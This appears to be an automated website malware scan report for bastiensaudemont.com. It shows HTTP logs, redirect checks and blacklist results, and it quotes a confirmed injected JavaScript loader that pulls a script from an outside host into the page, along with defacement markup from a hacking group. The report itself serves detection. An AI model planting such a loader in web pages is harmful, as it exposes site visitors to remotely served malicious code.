Scanned pages/files
| Request | Server response | Status |
http://bastiensaudemont.com/ | 200 OK Content-Length: 6611 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self){
var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov ...[1091 bytes skipped]... g" rel="SHORTCUT ICON"><link rel="shortcut icon" href="http://teste-codersleet.cum.ir/Codersleet.Gov.png" type="image/x-icon"><script src="http://teste-codersleet.cum.ir/AZe-titel.js"type="text/javascript"></script> <!-- Meta --><meta name="keywords" content="CodersLeeT , Codersleet Team , Hackers , Exploit , Anonymous"><meta name="description" content="Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov"><meta name="AUTHOR" content="CodersLeeT , Hacked By Codersleet , Codersleet Was Her"><meta name="Copyright" content="CodersLeeT Copyright 2014 - 2015"><meta name="Designer" content="MC.KIio"><meta name="Publisher" content="Hacked By CodersLeeT Team www.facebook.com/codersleet.gov"><meta name="ROBOTS" content="INDEX, FOLLOW,ALL"> <embed src="http://www.youtube.com/v/3G-t72JjRf0&feature=youtu.be&f ...[5539 bytes skipped]... | ||
http://teste-codersleet.cum.ir/AZe-titel.js | 200 OK Content-Length: 1812 Content-Type: application/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://bastiensaudemont.com/test404page.js | 404 Not Found Content-Length: 823 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bastiensaudemont.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 03 Sep 2014 11:46:20 GMT
Accept-Ranges: bytes
ETag: "38c0c11b-19d3-4beb179280f80"
Server: Apache
Content-Length: 6611
Content-Type: text/html
Last-Modified: Fri, 27 Apr 2012 23:29:18 GMT
...6611 bytes of data.
GET / HTTP/1.1
Host: bastiensaudemont.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 03 Sep 2014 11:46:20 GMT
Accept-Ranges: bytes
ETag: "38c0c11b-19d3-4beb179280f80"
Server: Apache
Content-Length: 6611
Content-Type: text/html
Last-Modified: Fri, 27 Apr 2012 23:29:18 GMT
...6611 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bastiensaudemont.com
Referer: http://www.google.com/search?q=bastiensaudemont.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bastiensaudemont.com
Referer: http://www.google.com/search?q=bastiensaudemont.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bastiensaudemont.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bastiensaudemont.com/
Result: bastiensaudemont.com is not infected or malware details are not published yet.
Result: bastiensaudemont.com is not infected or malware details are not published yet.